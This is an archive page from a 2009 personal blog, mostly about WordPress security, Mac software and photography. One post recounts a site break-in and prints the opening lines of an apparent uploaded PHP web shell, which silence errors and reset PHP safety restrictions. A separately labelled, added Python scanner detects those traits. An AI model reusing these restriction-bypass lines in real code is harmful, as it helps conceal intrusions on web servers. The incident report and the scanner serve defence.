Splash of Style...Macs, Photography, Design, and other Passions

I Was Hacked!

October 2, 2009 by debbie T | WordPress

Eeek! First off, let me say Thank God that I had the Wordpress plugin “WordPress File Monitor” installed, because that is what alerted me to the problem. Note to Bart B if you are reading this, heehe, I am glad I wasted my time with that voodoo! ;)

So, I get an email today from the Wordpress File Monitor (dated yesterday, I am slow) informing me that a bunch of files were uploaded to one of my other blogs in the “uploads” directory – left as 777 permissions for easy photo uploading.

In the uploads directory, a file named “img1.php” was added, along with a fresh new directory named “2008” with a bunch of sitemap files. (note: I just started this blog in July of 2009, and I have no entries or uploads from 2008, so it was very fishy.)

So, of course my first thought is am I going crazy? Did I somehow upload these files without knowing? Initially at first I didn’t notice the .php file, so I only thought the 2008 sitemap files were added.

I contacted my host, and she assured me that it wasn’t anything too terrible, that it was an every day run of the mill spammer. Sneaky spammers! She has seen this sort of thing many times.

She suggested I change my Wordpress password and check the database for any extra users. I found no other user accounts, thankfully!

For future reference, I found two articles that list details on how to find and remove any hidden admin users:

http://blog.nachotech.com/?p=125
http://www.studionashvegas.com/wordpress/latest-wordpress-hack-check-your-permalinks-people/

But now I am left puzzled on how they got in!

My Wordpress admin password was pretty strong – 15 characters (numerical, upper and lower case letters) and I wasn’t using the default “admin” as my user name either. My host also suggested it might have been from “an exploit via a plugin that isn’t secured against arbitrary remote inclusion/retrieval”

I am only running 4 plug-ins. Akismet, Hello Dolly, WP Security Scan, and WordPress File Monitor. I did also have the un-updated WordPress Exploit Scanner plug-in, but it was left de-activated. I have since removed it from the plugins folder.

I suppose since I don’t have a secure login, I imagine that possibly my password could have been bypassed? I dunno. I think I might install the Login Lockdown plugin – yeah, Bart more voodoo!

Well, anyway, I am going to really search through my files and make sure everything else is alright.

I found an article that might help me search through the database just in case the spammers attached anything to my posts.

Right now, it doesn’t look like much damage was done. But worst case scenario, I have database backups every night. I can always revert back to one of the older ones and re-create the newer entries I wrote, or I could even export my entries and install a fresh copy of WordPress. We’ll see.

So, be wary of your Wordpress blogs! I dunno how they got into mine, but they did, and thankfully I was lucky and it wasn’t too painful!

PS. I took a look at the .php file they added, and one of the first lines of code was $language=’ru’ (aah, From Russia with love!) But anyway, here is some of the code from the file:

error_reporting(0);
$language='ru';
$auth = 0;
$name='abcdef1234567890abcdef1234567890';
$pass='abcdef1234567890abcdef1234567890';
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
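
An added example (not from the original post or from any plugin it mentions): a Python scanner that checks an uploads directory for the signs described above, namely PHP files where only media belongs, the `error_reporting(0)` / `ini_restore` / `ini_set` header quoted from img1.php, and world-writable directories. The extension list, the function names and the sample tree it builds are assumptions made for illustration.

```python
import os
import re
import stat
import tempfile

# Extensions a typical PHP handler will execute (assumed list; match it to your server config).
PHP_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}

# Traits taken from the img1.php excerpt quoted in the post.
TRAITS = {
    "silences errors": re.compile(rb"error_reporting\s*\(\s*0\s*\)"),
    "resets PHP restrictions": re.compile(rb"ini_restore\s*\(\s*[\"'](safe_mode|open_basedir|disable_functions)"),
    "disables error log": re.compile(rb"ini_set\s*\(\s*[\"'](error_log|log_errors)[\"']"),
}

def scan_uploads(root):
    """Return {relative_path: [reasons]} for suspicious entries under root."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.setdefault(rel_dir, []).append("world-writable directory")
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in PHP_EXT:
                continue
            rel = os.path.normpath(os.path.join(rel_dir, name))
            reasons = findings.setdefault(rel, ["PHP file in uploads"])
            with open(os.path.join(dirpath, name), "rb") as fh:
                head = fh.read(65536)
            reasons += [label for label, rx in TRAITS.items() if rx.search(head)]
    return findings

def build_sample(root):
    """Constructed sample tree mirroring the post: img1.php plus a 777 uploads dir."""
    os.makedirs(os.path.join(root, "2009", "07"))
    os.chmod(root, 0o777)
    with open(os.path.join(root, "2009", "07", "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0 constructed image bytes")
    with open(os.path.join(root, "img1.php"), "wb") as fh:
        fh.write(b"<?php\nerror_reporting(0);\n$language='ru';\n"
                 b"@ini_restore(\"disable_functions\");\n@ini_set('error_log',NULL);\n")
    return root

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return scan_uploads(build_sample(os.path.join(tmp, "uploads")))

if __name__ == "__main__":
    print(demo())
```

Pointing `scan_uploads` at a real `wp-content/uploads` path gives a quick triage list; a clean result does not rule out changes elsewhere in the install.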

Mac Apps and Compatibility with Snow Leopard

October 2, 2009 by debbie T | Mac Corner, Mac Snow Leopard, Mac Software

I have Mac OS X Snow Leopard on order from Amazon. It will be here any day. In the meantime, I am getting organized and ready for the big re-install.

I have a plan to go the “upgrade” route first, to find out how much space I would save by upgrading.

Then the plan is to wipe the drive and install fresh.

Anyway, I want to make sure I get all my Mac apps in order with serial numbers, etc. I also want to make sure I download the most current version to ensure compatibility with Snow Leopard.

I found this great wiki site with lots of great info about Mac apps and their compatibility to Snow Leopard
http://snowleopard.wikidot.com/start

Amazon Call Me!

September 16, 2009 by debbie T | Internet

I was having a little problem with my Amazon purchase this morning, and I wanted to contact them about it. I clicked the “contact us” link at the bottom of the page.

A new window opens, and your account name & password can be entered. (not required)

I figured I would just email them, since it wasn’t a big problem. But when I saw the contact options I was intrigued.

I clicked on the “Phone” tab and found a feature that calls you instead of you calling them! I had to try it! (I am pretty sure this feature isn’t necessarily new, but it’s been a long time since I had any issues with Amazon, so I am behind the times!)

After typing in my account password again, it opens another new window where you need to type your phone number. The default is to call you right away, but there is an option to choose a 5, 10, or 15 minute delay.

Once you submit your phone number info, your phone will ring immediately! Pick it up, and an automated voice tells you to hang on, etc…I figured it might be a bit of a wait, but nope! I was talking to Jennifer within a minute and she helped me with my problem. I don’t think I was on the phone for longer than 5 minutes from start to finish.

Why would you want to use this feature instead of just calling them yourself? Well, probably because your account info is immediately known by the customer service associate and it saves a lot of time! Plus it’s soo freakin’ cool!

AppleStore Robbed

September 3, 2009 by debbie T | Mac Corner, Ramblings

No, it isn’t funny that an Applestore was robbed, but the guy doing the voice over on the surveillance tape sure is a riot. Who talks like that anymore?

“Leaving only the price tags behind!!!!” LOL. What a pompous jerk! I hate newscasters that sound like that!

http://abclocal.go.com/wpvi/video?id=6996090

(Note: I tried to embed the video, but for some reason, the code won’t work, so a link will have to do. Sorry)

Changing Admin User Name for Better Security in Wordpress

August 31, 2009 by debbie T | WordPress

It’s been advised to change the default “admin” user name on Wordpress installs, and it sounded like a great idea, until I tried to do it.

I found instructions, but details on how to actually edit the mySQL table were not explained. I tried to figure it out, but it just seemed too complicated.

The instructions over at guvnr.com were very helpful, but I didn’t want to start a new admin username, and delete the default user name, when I had so many older posts.

Well, I figured it out. Wordpress allows you to move your posts, pages, etc to a different user! Yay!

Add a new user with Admin privileges.
Go to Edit Posts and select all posts on the first page
Choose “Edit” from the Bulk Edit pull down menu and hit the Apply button
In the Bulk Edit editing area, choose your new user account from the Author pull down menu.
And lastly, hit the “Apply” button.

Go through each page of posts and repeat.

Awesome! I love Wordpress!

ETA: hahaa, okay, I admit I am a big dope. I went through the above steps on one of my WordPress blogs. After all posts were moved to the new user, it was time for me to delete my original admin user account.

I guess when you delete a user, Wordpress asks you if you want to attribute all posts to a new user, and gives you the opportunity to do so.

Oh well, I guess you all can ignore this post! haha!

One last note: Just make sure before you delete that you are logged out of the original admin account and logged in to the new one. And for safety, BACK UP your database first!!! Just in case!

Wordpress Security

August 31, 2009 by debbie T | WordPress

Slowly, I am working through all my Wordpress blogs and trying to make them more secure. I have found several web site articles and Wordpress plugins that have been very helpful.

New blog article from Matt – UPGRADING is the only way to keep yourself safe!

Good Mornin’

July 31, 2009 by debbie T | Digital Photography

Happy Friday!

Good morning bug on a wet leaf

Don’t Be Afraid to Think Big!

July 12, 2009 by debbie T | Digital Photography

We found this teenie tiny little guy this morning. Isn’t he adorable?

teenie tiny frog toad creature

Flight to Heaven

July 8, 2009 by debbie T | Digital Photography

Taken on our July 4th Holiday weekend. We were eating lunch by a little airport near Lake Winnipesaukee.

flying a plane to heaven

Importing Plain Text Into Excel Spreadsheet

July 5, 2009 by debbie T | Content Management, Mac Software, Windows on the Mac

I needed to convert a text document with personal data to an Excel spreadsheet. I wanted to use Neo Office (Open Office) but couldn’t find a way to import text, so I fired up my Windows XP virtual machine, and installed an old copy of Office 2000.

So, here’s the dilemma, the data was pasted into a text file from a web page and it was formatted with line breaks. There were 180 blocks of data like this:

first last
title
address
phone
email

first last
title
address
phone
email

After googling, I found that it’s fairly easy to import text as long as there is some sort of delimiter like tab, comma, semi-colon separating the data.

In Excel, choose Data>Get External Data>Import Text File

Initially, I tried comma, but didn’t work well, since some of the text data already had commas, so I decided to use a semi-colon delimiter.

I typed a semi-colon after each section & painstakingly removed each line break.

first ;last;title;address;phone;email
first ;last;title;address;phone;email
first ;last;title;address;phone;email

I worked in small chunks, importing after a few sections. This was taking forever. I needed a short cut!

Since I was using Text Wrangler, I figured there might be a way to automatically remove the line breaks. Yay! Found it. Text>Remove Line Breaks. Couldn’t be easier!

Okay, now if only there was a way to somehow add a semi-colon after each line. Whoo-hooo, how about this:

Text>Prefix/Suffix Lines

I selected each section, added the suffix of “;” then removed the line breaks.

Text Wrangler cut my work in half!

NOTE: When Text Wrangler removed the line breaks, it added a space in between the items, so that messed up my spreadsheet by adding a space before each item in the cell. Before I imported, I did a “find/replace” and replaced all the ;(space) with ; and that worked!